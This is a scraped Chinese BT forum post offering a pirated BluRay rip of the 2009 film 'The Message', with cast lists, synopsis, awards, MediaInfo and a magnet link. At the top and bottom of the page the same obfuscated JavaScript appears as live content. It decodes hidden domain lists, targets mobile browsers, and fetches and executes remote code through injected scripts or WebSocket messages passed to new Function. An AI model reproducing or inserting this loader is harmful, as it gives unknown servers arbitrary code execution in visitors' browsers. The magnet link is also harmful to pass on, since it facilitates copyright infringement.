风声[国语配音/中文字幕].The.Message.2009.1080p.BluRay.x265.10bit.DTS 7.05GB

版主小s 1月前 262

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 风声 / The Message

◎年 代 2009

◎产 地 中国大陆

◎类 别 剧情 / 惊悚 / 战争 / 犯罪

◎语 言 汉语普通话 / 日语

◎上映日期 2009-09-29(中国大陆) / 2020-07-20(中国大陆重映)

◎IMDb链接 https://www.imdb.com/title/tt1434423/

◎豆瓣评分 8.3/10 (510319人评价)

◎豆瓣链接 https://movie.douban.com/subject/3734112/

◎片 长 118分钟

◎导 演 陈国富 Kuo-fu Chen (id:1075862)

高群书 Qunshu Gao (id:1274943)

◎编 剧 陈国富 Kuo-fu Chen (id:1075862)

张家鲁 Chia-lu Chang (id:1274308)

麦家 Jia Mai (id:1319216)

◎演 员 周迅 Xun Zhou (id:1027798)

李冰冰 Bingbing Li (id:1040990)

张涵予 Hanyu Zhang (id:1274319)

王志文 Zhiwen Wang (id:1010208)

黄晓明 Xiaoming Huang (id:1041404)

苏有朋 Alec Su (id:1050540)

英达 Da Ying (id:1011479)

石兆琪 Zhaoqi Shi (id:1315058)

倪大红 Dahong Ni (id:1274306)

段奕宏 Yihong Duan (id:1274291)

朱旭 Xu Zhu (id:1275118)

刘威葳 Vieven Liu (id:1313992)

张一白 Yibai Zhang (id:1275554)

吴刚 Gang Wu (id:1274840)

邓家佳 Jiajia Deng (id:1274361)

刘芸 Yun Liu (id:1276152)

爱戴 Dai Ai (id:1318156)

刘芊孜 Qianzi Liu (id:1402695)

工藤俊作 Kudo Juku (id:1356821)

张立 Li Zhang (id:1316426)

郭家铭 Jiaming Guo (id:1315908)

朱宏嘉 Hongjia Zhu (id:1274560)

来喜 Laixi (id:1321645)

香川耕二 Koji Kagawa (id:1390205)

王中军 Zhongjun Wang (id:1276036)

冯小刚 Xiaogang Feng (id:1274255)

刘明轶 Mingyi Liu (id:1341091)

任仲伦 Zhonglun Ren (id:1333045)

杨庭恺 Bernard Yang (id:1443208)

王中磊 Zhonglei Wang (id:1276037)

张唯 Wei Zhang (id:1342506)

陶昆 Kun Tao (id:1354359)

大岛满 Michiru Oshima (id:1275201)

包轩鸣 Jake Pollock (id:1319117)

杨浩宇 Haoyu Yang (id:1331171)

肖海航 Haihang Xiao (id:1331170)

吴宝玲 Po-ling Ng (id:1293135)

叶锦添 Timmy Yip (id:1301493)

赵楠 Nan Zhao (id:1325307)

王丹戎 Danrong Wang (id:1276106)

刘万富 Wanfu Liu (id:1409775)

赵颖 Ying Zhao (id:1417520)

肖洋 Yang Xiao (id:1331182)

李智勇 Zhiyong Li (id:1456455)

胡璇 Xuan Hu (id:1331183)

刘正 Zheng Liu (id:1420059)

常松 Chang Song (id:1331944)

◎标 签 谍战 / 悬疑 / 中国 / 风声 / 剧情 / 人性 / 2009 / 血腥

◎简 介

1942年10月10日,汪伪政权举行了盛大的国民政府庆典。然而,一系列的军政要员遇刺事件,让身为特务处长王田香(王志文 饰)如坐针毡。在对女刺客(刘威葳 饰)的酷刑审问中,他获得了一条关键的情报——代号为老鬼的地下党已经混入了剿匪司令部。立功心切的王田香立刻向日本皇军特务机关长武田(黄晓明 饰)做了汇报。二人随即在裘庄布下了一个圈套,意图通过放出假消息逼老鬼现身。

在被怀疑的对象中,有司令的侍从官白小年(苏有朋 饰)、军机处长金生火(英达 饰)、剿匪大队长吴志国(张涵予 饰)、译电组组长李宁玉(李冰冰 饰)以及行政收发专员顾晓梦(周迅 饰)。在怀疑与排查中,武田与王田香不择手段软硬兼施,然而事情的发展却出乎意料……

◎获奖情况 (共26项)

第46届台北金马影展 (2009)

金马奖 最佳女主角

└──李冰冰 (id:1040990)

金马奖 最佳女主角(提名)

└──周迅 (id:1027798)

金马奖 最佳改编剧本(提名)

金马奖 最佳美术设计(提名)

金马奖 最佳造型设计(提名)

└──叶锦添 (id:1301493)

金马奖 最佳视觉效果(提名)

第29届香港电影金像奖 (2010)

最佳亚洲电影(提名)

第28届中国电影金鸡奖 (2011)

最佳男配角(提名)

└──黄晓明 (id:1041404)

最佳美术(提名)

第30届大众电影百花奖 (2010)

最佳故事片(提名)

最佳导演(提名)

最佳男主角(提名)

└──黄晓明 (id:1041404)

最佳男配角

└──苏有朋 (id:1050540)

第14届中国电影华表奖 (2011)

优秀合拍片奖

第4届亚洲电影大奖 (2010)

我最喜爱的男女主角 我最喜爱的女主角

└──李冰冰 (id:1040990)

最佳女主角(提名)

└──李冰冰 (id:1040990)

最佳男配角(提名)

└──黄晓明 (id:1041404)

最佳美术指导(提名)

第10届华语电影传媒大奖 (2010)

百家传媒年度致敬电影

百家传媒年度致敬电影(提名)

新世纪十年十佳电影

最佳女主角(提名)

第17届北京大学生电影节 (2010)

最佳影片奖

最佳女演员奖(提名)

└──李冰冰 (id:1040990)

评委会大奖(提名)

最受大学生欢迎男演员

└──黄晓明 (id:1041404)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 274604240558283262859128188184864880974 (0xCE96DA5C8CA3B738920A7594C691F94E)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.05 GiB

  8. Duration : 1 h 58 min

  9. Overall bit rate : 8 523 kb/s

  10. Encoded date : UTC 2021-10-14 00:54:23

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 58 min

  20. Bit rate : 6 987 kb/s

  21. Width : 1 920 pixels

  22. Height : 844 pixels

  23. Display aspect ratio : 2.25:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.180

  30. Stream size : 5.78 GiB (82%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x844 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 58 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 16 bits

  48. Compression mode : Lossy

  49. Stream size : 1.25 GiB (18%)

  50. Language : Chinese

  51. Default : Yes

  52. Forced : No


  53. Text #1

  54. ID : 3

  55. Format : PGS

  56. Muxing mode : zlib

  57. Codec ID : S_HDMV/PGS

  58. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  59. Duration : 1 h 51 min

  60. Bit rate : 16.6 kb/s

  61. Count of elements : 2208

  62. Stream size : 13.3 MiB (0%)

  63. Title : chs

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No


  67. Text #2

  68. ID : 4

  69. Format : PGS

  70. Muxing mode : zlib

  71. Codec ID : S_HDMV/PGS

  72. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  73. Duration : 1 h 51 min

  74. Bit rate : 17.1 kb/s

  75. Count of elements : 2208

  76. Stream size : 13.7 MiB (0%)

  77. Title : cht

  78. Language : Chinese

  79. Default : No

  80. Forced : No


  81. Text #3

  82. ID : 5

  83. Format : PGS

  84. Muxing mode : zlib

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 1 h 53 min

  88. Bit rate : 28.1 kb/s

  89. Count of elements : 2294

  90. Stream size : 22.9 MiB (0%)

  91. Title : eng

  92. Language : English

  93. Default : No

  94. Forced : No


  95. Menu

  96. 00:00:00.000 : en:Chapter 01

  97. 00:03:24.704 : en:Chapter 02

  98. 00:06:10.286 : en:Chapter 03

  99. 00:12:51.645 : en:Chapter 04

  100. 00:16:28.904 : en:Chapter 05

  101. 00:19:29.918 : en:Chapter 06

  102. 00:25:34.908 : en:Chapter 07

  103. 00:32:22.482 : en:Chapter 08

  104. 00:39:08.345 : en:Chapter 09

  105. 00:42:21.080 : en:Chapter 10

  106. 00:51:18.033 : en:Chapter 11

  107. 00:53:29.039 : en:Chapter 12

  108. 00:58:16.409 : en:Chapter 13

  109. 01:02:15.022 : en:Chapter 14

  110. 01:06:14.220 : en:Chapter 15

  111. 01:14:22.499 : en:Chapter 16

  112. 01:17:34.399 : en:Chapter 17

  113. 01:19:40.525 : en:Chapter 18

  114. 01:27:45.176 : en:Chapter 19

  115. 01:34:21.822 : en:Chapter 20

  116. 01:38:56.847 : en:Chapter 21

  117. 01:43:10.642 : en:Chapter 22

  118. 01:50:53.730 : en:Chapter 23

  119. 01:55:49.817 : en:Chapter 24




复制代码


TAGS 剧情 惊悚 犯罪 战争

磁力链:
  • magnet:?xt=urn:btih:8E0638B8938FC265038AD2B0CB7BE5266DB01CDE

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};